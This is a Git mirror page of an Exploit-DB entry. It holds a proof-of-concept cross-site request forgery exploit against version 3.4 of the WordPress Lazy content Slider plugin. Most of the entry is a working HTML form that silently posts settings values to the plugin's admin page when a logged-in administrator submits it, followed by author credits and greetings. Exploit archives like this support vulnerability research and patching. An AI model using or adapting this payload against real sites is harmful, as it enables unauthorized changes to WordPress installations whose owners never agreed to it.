bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/40070.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

30 lines
No EOL
1,009 B
Text
Raw Blame History

######################
# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.4
# Date: 2016/07/08
######################
#
# PoC:
# The vulnerable page is
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
# The Code for CSRF.html is
<html>
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
<input name="lzcs" type="text" value="lzcs">
<input name="lzcs_color" type="text" value="dark">
<input type="text" name="lzcs_count" value="5">
<input type="submit" value="go!!">
</form>
</html>
#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
Reference in a new issue View git blame Copy permalink